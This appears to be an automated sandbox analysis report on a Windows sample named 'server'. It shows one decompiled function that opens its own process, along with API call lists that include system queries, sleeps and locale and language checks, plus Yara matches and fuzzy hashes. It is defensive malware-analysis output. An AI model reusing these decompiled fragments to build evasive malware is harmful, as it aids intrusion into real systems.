                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401D68() {
                    				void* _t1;
                    				unsigned int _t3;
                    				void* _t4;
                    				long _t5;
                    				void* _t6;
                    				intOrPtr _t10;
                    				void* _t14;
                    
                    				_t10 =  *0x404170;
                    				_t1 = CreateEventA(0, 1, 0, 0);
                    				 *0x40417c = _t1;
                    				if(_t1 == 0) {
                    					return GetLastError();
                    				}
                    				_t3 = GetVersion();
                    				if(_t3 != 5) {
                    					L4:
                    					if(_t14 <= 0) {
                    						_t4 = 0x32;
                    						return _t4;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					if(_t3 >> 8 > 0) {
                    						L5:
                    						 *0x40416c = _t3;
                    						_t5 = GetCurrentProcessId();
                    						 *0x404168 = _t5;
                    						 *0x404170 = _t10;
                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                    						 *0x404164 = _t6;
                    						if(_t6 == 0) {
                    							 *0x404164 =  *0x404164 | 0xffffffff;
                    						}
                    						return 0;
                    					} else {
                    						_t14 = _t3 - _t3;
                    						goto L4;
                    					}
                    				}
                    			}










                    0x00401d69
                    0x00401d77
                    0x00401d7d
                    0x00401d84
                    0x00401ddb
                    0x00401ddb
                    0x00401d86
                    0x00401d8e
                    0x00401d9b
                    0x00401d9b
                    0x00401dd7
                    0x00401dd9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401d90
                    0x00401d97
                    0x00401d9d
                    0x00401d9d
                    0x00401da2
                    0x00401db0
                    0x00401db5
                    0x00401dbb
                    0x00401dc1
                    0x00401dc8
                    0x00401dca
                    0x00401dca
                    0x00401dd4
                    0x00401d99
                    0x00401d99
                    0x00000000
                    0x00401d99
                    0x00401d97

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                    • GetVersion.KERNEL32 ref: 00401D86
                    • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                    • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: 1ac6c022222df10fddb45b89cce92d0bd369c4a3ad6ba39bd49a2e21b0455d6a
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: EB318AB6910609CFDB10CF99C880AEEBBF9FF48328F24504AD941A7351D771EA45CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 2c82bd516d6ff097f8176106e61eb0d6ffe2c8492c1e619661976ec5e8f84ee2
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: B801D472A006008FDB21DF60C804BEA37B9FB85309F1544A4DA0697282E370A9458B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 00541824
                    • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00541884
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0054167F,0000000A), ref: 005418AF
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 005418D0
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 005418D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                    • String ID:
                    • API String ID: 2685682793-0
                    • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction ID: f6e29ca944e67365e6ae3a2000c8885cbf27dc5ee4e42e954d72adac0d88edef
                    • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction Fuzzy Hash: C12195B2A00208BFD710AFA4DC88EEE7FBDFB44399F104535FA05E7190D67099848B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00542052
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00542062
                    • GetCommandLineW.KERNEL32 ref: 0054206D
                      • Part of subcall function 00541C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00541C8D
                      • Part of subcall function 00541C58: Sleep.KERNEL32(00000000,00000030), ref: 00541CD4
                      • Part of subcall function 00541C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00541CFC
                      • Part of subcall function 00541C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00541D06
                      • Part of subcall function 00541C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00541D19
                    • HeapDestroy.KERNEL32 ref: 00542080
                    • ExitProcess.KERNEL32 ref: 00542087
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                    • String ID:
                    • API String ID: 1393419808-0
                    • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction ID: 7d4c78cad3f176cd08ce5d6c33f50af62d265402530ecd0bb37f8dad81e814ca
                    • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction Fuzzy Hash: 70E0B6B0843630ABC3216F71BE0CA8E7E68BB59B567000935F605F2125CB384A81CA9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00541C63), ref: 00541FDE
                    • GetVersion.KERNEL32(?,00541C63), ref: 00541FED
                    • GetCurrentProcessId.KERNEL32(?,00541C63), ref: 00542009
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00541C63), ref: 00542022
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction ID: f302b5d79a36a58f73ddd264fac5750a70c4840e0ac5f2e0b5fabbbbc46e58aa
                    • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction Fuzzy Hash: C6F08CB05413209BE7609F78BE0DB953FA4B795752F400035F645FA1E4E7708982CB5C
                    Uniqueness

                    Uniqueness Score: -1.00%